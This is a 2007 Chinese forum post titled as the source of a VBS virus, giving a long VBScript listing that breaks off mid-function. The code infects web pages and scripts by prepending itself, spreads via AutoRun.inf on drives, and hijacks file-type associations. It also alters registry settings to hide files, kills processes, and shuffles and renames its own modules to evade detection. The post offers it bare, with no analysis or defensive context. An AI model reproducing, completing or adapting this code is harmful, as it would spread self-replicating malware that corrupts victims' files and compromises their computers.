Board logo

标题: 一个VBS病毒的原码 [打印本页]

作者: novaa    时间: 2007-11-5 22:47     标题: 一个VBS病毒的原码

  1. 'Administrator4
  2. 'FYCOKKOUFWQFE2_20
  3. Function GetModelCode(vbsCode, N_ModelCode)
  4.     On Error Resume Next
  5.     Dim n, n1, buffer
  6.     buffer = vbsCode
  7.     If N_ModelCode>= 1 And N_ModelCode<= 9 Then
  8.         n = InStr(buffer, ModelHead & "1_" & N_ModelCode)
  9.         n1 = InStr(buffer, ModelTail & "1_" & N_ModelCode)
  10.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "1_" & N_ModelCode))
  11.     ElseIf N_ModelCode>= 10 And N_ModelCode<= 99 Then
  12.         n = InStr(buffer, ModelHead & "2_" & N_ModelCode)
  13.         n1 = InStr(buffer, ModelTail & "2_" & N_ModelCode)
  14.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "2_" & N_ModelCode))
  15.     ElseIf N_ModelCode>= 100 And N_ModelCode<= 999 Then
  16.         n = InStr(buffer, ModelHead & "3_" & N_ModelCode)
  17.         n1 = InStr(buffer, ModelTail & "3_" & N_ModelCode)
  18.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "3_" & N_ModelCode))
  19.     End If
  20. End Function
  21. 'OJCQCFHDTCJ2_20
  22. 'FYCOKKOUFWQFE2_19
  23. Function GetVersion(objfso, path_v)
  24.     Dim FV, buffer
  25.     Set FV = objfso.OpenTextFile(path_v, 1)
  26.     buffer = FV.ReadAll()
  27.     GetVersion = Mid(buffer, InStr(buffer, Head_V) + Len(Head_V), 1)
  28. End Function
  29. Function GetScriptCode(Languages)
  30.     On Error Resume Next
  31.     Dim soj
  32.     For Each soj In document.Scripts
  33.         If LCase(soj.Language) = Languages Then
  34.             Select Case LCase(soj.Language)
  35.                 Case "vbscript"
  36.                     GetScriptCode = soj.Text
  37.                     Exit Function
  38.                 Case "javascript"
  39.                     GetScriptCode = soj.Text
  40.                     Exit Function
  41.             End Select
  42.         End If
  43.     Next
  44. End Function
  45. Function GetSelfCode(objfso, FullPath_Self)
  46.     On Error Resume Next
  47.     Dim n, n1, buffer, Self
  48.     Set Self = objfso.OpenTextFile(FullPath_Self, 1)
  49.     buffer = Self.ReadAll
  50.     n = InStr(buffer, Head_V)
  51.     n1 = InstrRev(buffer, Tail_V)
  52.     buffer = Mid(buffer, n, n1 - n + Len(Tail_V) + 1)
  53.     GetSelfCode = buffer
  54.     Self.Close
  55. End Function
  56. Function GetMainBody(vbsCode, Sum_ModelCode)
  57.     Dim i
  58.     For i = 2 To Sum_ModelCode
  59.         GetMainBody = GetMainBody & VBCRLF & GetModelCode(vbsCode, i) & VBCRLF
  60.     Next
  61. End Function
  62. 'OJCQCFHDTCJ2_19
  63. 'FYCOKKOUFWQFE1_2
  64. Sub ExeVbs_WebPage()
  65.     On Error Resume Next
  66.     Dim objfso, vbsCode, VbsCode_Virus
  67.     Set objfso = CreateObject(GetFSOName())
  68.     vbsCode = GetScriptCode("vbscript")
  69.     VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  70.     VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  71.     Call InvadeSystem(objfso, VbsCode_Virus)
  72.     Set objfso = Nothing
  73. End Sub
  74. Sub ExeVbs_Victim()
  75.     On Error Resume Next
  76.     Dim objfso, vbsCode, VbsCode_Virus
  77.     Set objfso = CreateObject(GetFSOName())
  78.     vbsCode = GetSelfCode(objfso, WScript.ScriptFullName)
  79.     VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  80.     VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  81.     Call InvadeSystem(objfso, VbsCode_Virus)
  82.     Call Run(FullPath_V1)
  83.     Set objfso = Nothing
  84. End Sub
  85. 'OJCQCFHDTCJ1_2
  86. 'FYCOKKOUFWQFE2_26
  87. Sub Run(ExeFullName)
  88.     Dim WshShell
  89.     Set WshShell = WScript.CreateObject("WScript.Shell")
  90.     WshShell.Run ExeFullName
  91.     Set WshShell = Nothing
  92. End Sub
  93. Sub CopyFile(objfso, code, pathf)
  94.     On Error Resume Next
  95.     Dim vf
  96.     Set vf = objfso.OpenTextFile(pathf, 2, true)
  97.     vf.Write code
  98. End Sub
  99. Function ChangeName(vbsCode, Names)
  100.     Dim Name, j, temp, buffer
  101.     buffer = vbsCode
  102.     Randomize
  103.     For Each Name in Names
  104.         temp = ""
  105.         For j = 1 To Len(Name)
  106.             temp = temp & Chr((Int(Rnd * 26) + 65))
  107.         Next
  108.         buffer = Replace(buffer, Name, temp)
  109.     Next
  110.     ChangeName = buffer
  111. End Function
  112. 'OJCQCFHDTCJ2_26
  113. 'FYCOKKOUFWQFE2_24
  114. Sub KillProcess(ProcessNames)
  115.     On Error Resume Next
  116.     Dim objShell, intReturn, name_exe
  117.     Set objShell = WScript.CreateObject("WScript.Shell")
  118.     strComputer = "."
  119.     Set objWMIServices = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  120.     For Each ProcessName in ProcessNames
  121.         Set colProcessList = objWMIServices.Execquery(" Select * From win32_process where name = '" & ProcessName & "' ")
  122.         For Each objProcess in colProcessList
  123.             intReturn = objProcess.Terminate
  124.             Select Case intReturn
  125.                 Case 2
  126.                     name_exe = objProcess.Name
  127.                     name_exe = Left(name_exe, Len(name_exe) -4)
  128.                     objShell.Run "cmd.exe /c @tskill " & name_exe, 0, False
  129.             End Select
  130.         Next
  131.     Next
  132.     Set objShell = Nothing
  133. End Sub
  134. 'OJCQCFHDTCJ2_24
  135. 'FYCOKKOUFWQFE2_21
  136. Function IsSexFile(fname)
  137.     IsSexFile = False
  138.     If InStr(fname, "成人")>0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷拍")>0 Or _
  139.                 InStr(fname, "偷窥")>0 Or InStr(fname, "口交")>0 Or InStr(fname, "强奸")>0 Or _
  140.                 InStr(fname, "轮奸")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "自摸")>0 Then
  141.         IsSexFile = True
  142.     End If
  143. End Function
  144. Function Isinfected(buffer, ftype)
  145.     Isinfected = True
  146.     Select Case ftype
  147.         Case "hta", "htm" , "html" , "asp", "vbs"
  148.             If InStr(buffer, Head_V) = 0 Then
  149.                 Isinfected = False
  150.             End If
  151.         Case Else
  152.             Isinfected = True
  153.     End Select
  154. End Function
  155. 'OJCQCFHDTCJ2_21
  156. 'FYCOKKOUFWQFE2_12
  157. Sub InfectHead(strPath, fi, objfso, VbsCode_WebPage, VbsCode_Victim, ftype, T)
  158.     On Error Resume Next
  159.     Dim tso, buffer, strCode , Maxsize
  160.     Maxsize = 350000
  161.     If fi.Size< Maxsize Then
  162.         Set tso = objfso.OpenTextFile(strPath, 1, True)
  163.         buffer = tso.ReadAll()
  164.         tso.Close
  165.         If T = 0 Then
  166.             Select Case ftype
  167.                 Case "hta", "htm", "html", "asp"
  168.                     If Isinfected(buffer, ftype) = False Then
  169.                         Set tso = objfso.OpenTextFile(strPath, 2, true)
  170.                         strCode = MakeScript(VbsCode_WebPage, 0)
  171.                         tso.Write strCode & VBCRLF & buffer
  172.                         Cnt = Cnt + 1
  173.                     End If
  174.                 Case "vbs"
  175.                     If Isinfected(buffer, ftype) = False Then
  176.                         n = InStr(buffer , "Option Explicit")
  177.                         If n<>0 Then
  178.                             buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
  179.                             Set tso = objfso.OpenTextFile(strPath, 2, true)
  180.                             tso.Write vbsCode_Victim & VBCRLF & buffer
  181.                             Cnt = Cnt + 1
  182.                         Else
  183.                             Set tso = objfso.OpenTextFile(strPath, 2, true)
  184.                             tso.Write vbsCode_Victim & VBCRLF & buffer
  185.                             Cnt = Cnt + 1
  186.                         End If
  187.                     End If
  188.                 Case Else
  189.                     '
  190.                     '
  191.             End Select
  192.         ElseIf T = 1 Then
  193.             If Isinfected(buffer, ftype) = True Then
  194.                 n = InStrRev(buffer , Tail_V)
  195.                 If n<>0 Then
  196.                     buffer = Replace(buffer, Tail_V, "", n, 1, 1)
  197.                     Set tso = objfso.OpenTextFile(strPath, 2, True)
  198.                     tso.Write strCode & VBCRLF & buffer
  199.                 End If
  200.             End If
  201.         End If
  202.     End If
  203. End Sub
  204. 'OJCQCFHDTCJ2_12
  205. 'FYCOKKOUFWQFE1_3
  206. Sub ExeVbs_Virus()
  207.     On Error Resume Next
  208.     Dim objfso, objshell, FullPath_Self, Name_Self, Names
  209.     Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath
  210.     Dim Order, Order_Order, Order_Para
  211.     Dim vbsCode , VbsCode_Virus, VbsCode_WebPage, VbsCode_Victim , MainBody
  212.     Set objfso = CreateObject(GetFSOName())
  213.     Set objshell = CreateObject("WScript.Shell")
  214.     FullPath_Self = WScript.ScriptFullName
  215.     Name_Self = WScript.ScriptName
  216.     Names = Array("FYCOKKOUFWQFE", "OJCQCFHDTCJ")
  217.     Set oArgs = WScript.Arguments
  218.     ArgNum = 0
  219.     Do While ArgNum < oArgs.Count
  220.         Para_V = Para_V & " " & oArgs(ArgNum)
  221.         ArgNum = ArgNum + 1
  222.     Loop
  223.     SubPara_V = LCase(Right(Para_V, 3))
  224.     Select Case SubPara_V
  225.         Case "run"
  226.             RunPath = Left(FullPath_Self, 2)
  227.             Call Run(RunPath)
  228.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  229.             VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  230.             VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  231.             VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  232.             Call InvadeSystem(objfso, VbsCode_Virus)
  233.             Call Run(FullPath_V1)
  234.         Case "txt", "log"
  235.             RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V
  236.             Call Run(RunPath)
  237.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  238.             VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  239.             VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  240.             VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  241.             Call InvadeSystem(objfso, VbsCode_Virus)
  242.             Call Run(FullPath_V1)
  243.         Case "reg"
  244.             Para_V = "regedit.exe " & """" & Trim(Para_V) & """"
  245.             Call Run(Para_V)
  246.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  247.             VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  248.             VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  249.             VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  250.             Call InvadeSystem(objfso, VbsCode_Virus)
  251.             Call Run(FullPath_V1)
  252.         Case "chm"
  253.             Para_V = "hh.exe " & """" & Trim(Para_V) & """"
  254.             Call Run(Para_V)
  255.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  256.             VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  257.             VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  258.             VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  259.             Call InvadeSystem(objfso, VbsCode_Virus)
  260.             Call Run(FullPath_V1)
  261.         Case "hlp"
  262.             Para_V = "winhlp32.exe " & """" & Trim(Para_V) & """"
  263.             Call Run(Para_V)
  264.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  265.             VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  266.             VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  267.             VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  268.             Call InvadeSystem(objfso, VbsCode_Virus)
  269.             Call Run(FullPath_V1)
  270.         Case Else
  271.             If PreInstance = True Then
  272.                 WScript.Quit
  273.             End If
  274.             If IsOK(objfso, Date(), FullPath_Config) = False Then
  275.                 If objfso.FileExists(FullPath_Config) = True Then
  276.                     Order = Trim(ReadOK(objfso, FullPath_Config))
  277.                     Order_Order = Trim(Mid(Order, 1, InStr(1, Order, "@") -1))
  278.                     Order_Para = Trim(Mid(Order, InStr(1, Order, "@") + 1, Len(Order) - InStr(1, Order, "@")))
  279.                 End If
  280.                 Select Case Order_Order
  281.                 Case "InfectFiles"
  282.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  283.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  284.                     VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
  285.                     VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
  286.                     VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
  287.                     VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
  288.                     VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
  289.                     VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
  290.                     VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
  291.                     VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  292.                     VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  293.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
  294.                     Order_Para = Order_Para + Cnt
  295.                     If Order_Para>2000 Then
  296.                         Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***-_- !")
  297.                     Else
  298.                         Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para)
  299.                     End If
  300.                     Call InvadeSystem(objfso, VbsCode_Virus)
  301.                     Call MonitorSystem(objfso, VbsCode_Virus)
  302.                 Case "Msg"
  303.                     MsgBox Order_Para
  304.                     Call WriteOK(objfso, FullPath_Config, "", "")
  305.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  306.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  307.                     VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
  308.                     VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  309.                     VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  310.                     Call InvadeSystem(objfso, VbsCode_Virus)
  311.                     Call MonitorSystem(objfso, VbsCode_Virus)
  312.                 Case "UnLoadMe"
  313.                     Call RestoreSystem(objfso)
  314.                     Wscript.Quit
  315.                 Case "KillVirus"
  316.                     Call RestoreSystem(objfso)
  317.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1)
  318.                     Wscript.Quit
  319.                 Case Else
  320.                     vbsCode = GetSelfCode(objfso, FullPath_Self)
  321.                     MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  322.                     VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
  323.                     VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
  324.                     VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
  325.                     VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
  326.                     VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
  327.                     VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
  328.                     VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
  329.                     VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
  330.                     VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
  331.                     Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
  332.                     Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt)
  333.                     Call InvadeSystem(objfso, VbsCode_Virus)
  334.                     Call MonitorSystem(objfso, VbsCode_Virus)
  335.             End Select
  336.         Else
  337.             vbsCode = GetSelfCode(objfso, FullPath_Self)
  338.             MainBody = GetMainBody(vbsCode, Sum_ModelCode)
  339.             VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V '生成病毒体完整代码
  340.             VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) '改变模块组合顺序
  341.             VbsCode_Virus = ChangeName(VbsCode_Virus, Names) '改变模块标志名称
  342.             Call MonitorSystem(objfso, VbsCode_Virus)
  343.         End If
  344.     End Select
  345.     Set objfso = Nothing
  346.     Set objshell = Nothing
  347. End Sub
  348. 'OJCQCFHDTCJ1_3
  349. 'FYCOKKOUFWQFE2_14
  350. Function ReadOK(objfso, FullPath_OK)
  351.     On Error Resume Next
  352.     Dim vf, buffer
  353.     Set vf = objfso.OpenTextFile(FullPath_OK, 1)
  354.     buffer = vf.ReadAll
  355.     ReadOK = RTrim(Mid(buffer, InStr(buffer, "Order:") + 6, 50))
  356. End Function
  357. Sub WriteOK(objfso, FullPath_OK, Order_Order, Order_Para)
  358.     On Error Resume Next
  359.     Dim vf1
  360.     objfso.DeleteFile FullPath_OK, True
  361.     Set vf1 = objfso.OpenTextFile(FullPath_OK, 2, True)
  362.     vf1.Write "OK" & VBCRLF
  363.     vf1.WriteLine Date()
  364.     vf1.WriteLine "Order:" & Order_Order & "@" & Order_Para
  365.     Call SetFileAttr(objfso, FullPath_OK)
  366. End Sub
  367. 'OJCQCFHDTCJ2_14
  368. 'FYCOKKOUFWQFE2_17
  369. Function PreInstance()
  370.     On Error Resume Next
  371.     Dim num_cnt
  372.     Dim strComputer, objWMIService, colProcessList, objProcess
  373.     num_cnt = 0
  374.     PreInstance = False
  375.     strComputer = "."
  376.     Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  377.     Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")
  378.     For Each objProcess in colProcessList
  379.         If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
  380.             num_cnt = num_cnt + 1
  381.         End If
  382.     Next
  383.     If num_cnt>= 2 Then
  384.         PreInstance = True
  385.     End If
  386. End Function
  387. 'OJCQCFHDTCJ2_17
  388. 'FYCOKKOUFWQFE2_18
  389. Function IsOK(objfso, Now_V, path_f)
  390.     On Error Resume Next
  391.     Dim vf, p1, p2, p3
  392.     IsOK = False
  393.     Set vf = objfso.OpenTextFile(path_f, 1)
  394.     p1 = Trim(vf.ReadLine)
  395.     p2 = Trim(vf.ReadLine)
  396.     p3 = Trim(vf.ReadLine)
  397.     If StrComp(p1, "OK", 1) = 0 And StrComp(p2, Now_V, 1) = 0 Then
  398.         IsOK = True
  399.     End If
  400.     If p3 = "Admin" Then
  401.         MsgBox "You Are Admin!!! Your Computer Will Not Be Infected!!!"
  402.         IsOK = True
  403.         n = InputBox("0:退出; 1:监视系统; 2:传染文件", "SuperVirus脚本测试!")
  404.         If n = 0 Then
  405.             Wscript.Quit
  406.         ElseIf n = 1 Then
  407.             IsOK = True
  408.         ElseIf n = 2 Then
  409.             IsOK = False
  410.         End If
  411.     End If
  412. End Function
  413. 'OJCQCFHDTCJ2_18
  414. 'FYCOKKOUFWQFE1_6
  415. Sub AutoRun(objfso, D, vbsCode)
  416.     On Error Resume Next
  417.     Dim path_autorun, path_vbs, inf_autorun
  418.     path_autorun = D & ":\AutoRun.inf"
  419.     path_vbs = D & ":\" & Name_V1
  420.     If objfso.FileExists(path_vbs) = False Or objfso.FileExists(path_autorun) = False Or GetVersion(objfso, path_vbs)<Version Then
  421.         If objfso.FileExists(path_autorun) = True Then
  422.             objfso.DeleteFile path_autorun, True
  423.         End If
  424.         If objfso.FileExists(path_vbs) = True Then
  425.             objfso.DeleteFile path_vbs, True
  426.         End If
  427.         Call CopyFile(objfso, vbsCode, path_vbs)
  428.         Call SetFileAttr(objfso, path_vbs)
  429.         inf_autorun = "[AutoRun]" & VBCRLF & "Shellexecute=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun=打开(&O)" & VBCRLF & "shell\AutoRun\command=WScript.exe " & Name_V1 & " ""AutoRun""" & VBCRLF & "shell\AutoRun1=资源管理器(&X)" & VBCRLF & "shell\AutoRun1\command=WScript.exe " & Name_V1 & " ""AutoRun"""
  430.         Call CopyFile(objfso, inf_autorun, path_autorun)
  431.         Call SetFileAttr(objfso, path_autorun)
  432.     End If
  433. End Sub
  434. 'OJCQCFHDTCJ1_6
  435. 'FYCOKKOUFWQFE1_9
  436. Function ChangeModelOrder(vbsCode, Num_DNA)
  437.     On Error Resume Next
  438.     Dim DNA(), Array_vbsCode()
  439.     Dim i, Value, flag, j, buffer
  440.     ReDim DNA(Num_DNA), Array_vbsCode(Num_DNA)
  441.     buffer = vbsCode
  442.     Randomize
  443.     For i = 1 To Num_DNA
  444.         Do
  445.             Value = Int((Num_DNA * Rnd) + 1)
  446.             flag = 1
  447.             For j = 1 To Num_DNA
  448.                 If Value = DNA(j) Then
  449.                     flag = 0
  450.                     Exit For
  451.                 End If
  452.             Next
  453.         Loop Until flag = 1
  454.         DNA(i) = Value
  455.     Next
  456.     For i = 1 To Num_DNA
  457.         Array_vbsCode(i) = GetModelCode(buffer, i)
  458.     Next
  459.     buffer = ""
  460.     For i = 1 To Num_DNA
  461.         buffer = buffer & VBCRLF & Array_vbsCode(DNA(i)) & VBCRLF
  462.     Next
  463.     ChangeModelOrder = Head_V & Version & VBCRLF & buffer & VBCRLF & Tail_V
  464. End Function
  465. 'OJCQCFHDTCJ1_9
  466. 'FYCOKKOUFWQFE1_4
  467. Function Head()
  468.     Head = VBCRLF & "'FYCOKKOUFWQFE1_1" & VBCRLF &_
  469.     "On Error Resume Next" & VBCRLF &_
  470.     "Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V" & VBCRLF &_
  471.     "Dim ModelHead, ModelTail" & VBCRLF &_
  472.     "Cnt = 0" & VBCRLF &_
  473.     "CntMax = 1000" & VBCRLF &_
  474.     "Version = ""4""" & VBCRLF &_
  475.     "Name_V1 = GetUserName() & "".vbs""" & VBCRLF &_
  476.     "FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_
  477.     "FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令" & VBCRLF &_
  478.     "FullPath_Config= GetSFolder(1) & GetUserName() & "".ini""" & VBCRLF &_
  479.     "Sum_ModelCode = 26" & VBCRLF &_
  480.     "Head_V= GetHeadTail(0)" & VBCRLF &_
  481.     "Tail_V= GetHeadTail(1)" & VBCRLF &_
  482.     "ModelHead=""'FYCOKKOUFWQFE""" & VBCRLF &_
  483.     "ModelTail=""'OJCQCFHDTCJ""" & VBCRLF
  484. End Function
  485. Function VictimHead()
  486.     VictimHead = Head() & VBCRLF &_
  487.     "Call VictimMain()" & VBCRLF &_
  488.     "Sub VictimMain()" & VBCRLF &_
  489.     "    Call ExeVbs_Victim()" & VBCRLF &_
  490.     "End Sub" & VBCRLF &_
  491.     "'OJCQCFHDTCJ1_1" & VBCRLF
  492. End Function
  493. Function VirusHead()
  494.     VirusHead = Head() & VBCRLF &_
  495.     "Call VirusMain()" & VBCRLF &_
  496.     "Sub VirusMain()" & VBCRLF &_
  497.     "    On Error Resume Next" & VBCRLF &_
  498.     "    Call ExeVbs_Virus()" & VBCRLF &_
  499.     "End Sub" & VBCRLF & VBCRLF &_
  500.     "'OJCQCFHDTCJ1_1" & VBCRLF
  501. End Function
  502. Function WebHead()
  503.     WebHead = Head() & VBCRLF &_
  504.     "Call WebMain()" & VBCRLF &_
  505.     "Sub WebMain()" & VBCRLF &_
  506.     "    On Error Resume Next" & VBCRLF &_
  507.     "    Call ExeVbs_WebPage()" & VBCRLF &_
  508.     "End Sub" & VBCRLF &_
  509.     "'OJCQCFHDTCJ1_1" & VBCRLF
  510. End Function
  511. 'OJCQCFHDTCJ1_4
  512. 'FYCOKKOUFWQFE2_25
  513. Sub DeleteReg(strkey)
  514.     Dim tmps
  515.     Set tmps = CreateObject("WScript.Shell")
  516.     tmps.RegDelete strkey
  517.     Set tmps = Nothing
  518. End Sub
  519. Function ReadReg(strkey)
  520.     Dim tmps
  521.     Set tmps = CreateObject("WScript.Shell")
  522.     ReadReg = tmps.RegRead(strkey)
  523.     Set tmps = Nothing
  524. End Function
  525. Sub WriteReg(strkey, Value, vtype)
  526.     Dim tmps
  527.     Set tmps = CreateObject("WScript.Shell")
  528.     If vtype = "" Then
  529.         tmps.RegWrite strkey, Value
  530.     Else
  531.         tmps.RegWrite strkey, Value, vtype
  532.     End If
  533.     Set tmps = Nothing
  534. End Sub
  535. 'OJCQCFHDTCJ2_25
  536. 'FYCOKKOUFWQFE1_1
  537. On Error Resume Next
  538. Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V
  539. Dim ModelHead, ModelTail
  540. Cnt = 0
  541. CntMax = 1000
  542. Version = "4"
  543. Name_V1 = GetUserName() & ".vbs"
  544. FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向
  545. FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令
  546. FullPath_Config= GetSFolder(1) & GetUserName() & ".ini"
  547. Sum_ModelCode = 26
  548. Head_V= GetHeadTail(0)
  549. Tail_V= GetHeadTail(1)
  550. ModelHead="'FYCOKKOUFWQFE"
  551. ModelTail="'OJCQCFHDTCJ"
  552. Call VirusMain()
  553. Sub VirusMain()
  554.     On Error Resume Next
  555.     Call ExeVbs_Virus()
  556. End Sub
  557. 'OJCQCFHDTCJ1_1
  558. 'FYCOKKOUFWQFE2_13
  559. Sub DeSafeSet()
  560.     Dim HLMShow , HCUAdvanced, HCUExplorer
  561.     HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
  562.     HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
  563.     HCUExplorer = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
  564.     Call WriteReg (HCUExplorer, 129, "REG_DWORD")
  565.     Call WriteReg (HCUAdvanced, 0, "REG_DWORD")
  566.     Call WriteReg (HLMShow, 0, "REG_DWORD")
  567. End Sub
  568. Sub SafeSet()
  569.     Dim HLMShow , HCUSSHidden, HCUHidden
  570.     Dim HCUExplorer
  571.     HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
  572.     HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
  573.     HCUHidden = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
  574.     Call WriteReg (HCUHidden, 1, "REG_DWORD")
  575.     Call WriteReg (HCUAdvanced, 1, "REG_DWORD")
  576.     Call WriteReg (HLMShow, 1, "REG_DWORD")
  577. End Sub
  578. 'OJCQCFHDTCJ2_13
  579. 'FYCOKKOUFWQFE1_8
  580. Sub RestoreSystem(objfso)
  581.     On Error Resume Next
  582.     Dim Value, dc, d, HCULoad
  583.     Call SafeSet()
  584.     HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
  585.     If ReadReg(HCULoad) = FullPath_V1 Then
  586.         Call DeleteReg(HCULoad)
  587.     End If
  588.     Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
  589.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
  590.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  591.     End If
  592.     Value = "regedit.exe " & """%1"""
  593.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
  594.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  595.     End If
  596.     Value = GetSFolder(1) & "hh.exe " & """%1"""
  597.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
  598.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
  599.     End If
  600.     Value = "%SystemRoot%\system32\winhlp32.exe %1"
  601.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
  602.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  603.     End If
  604.     Value = """%1"" %*"
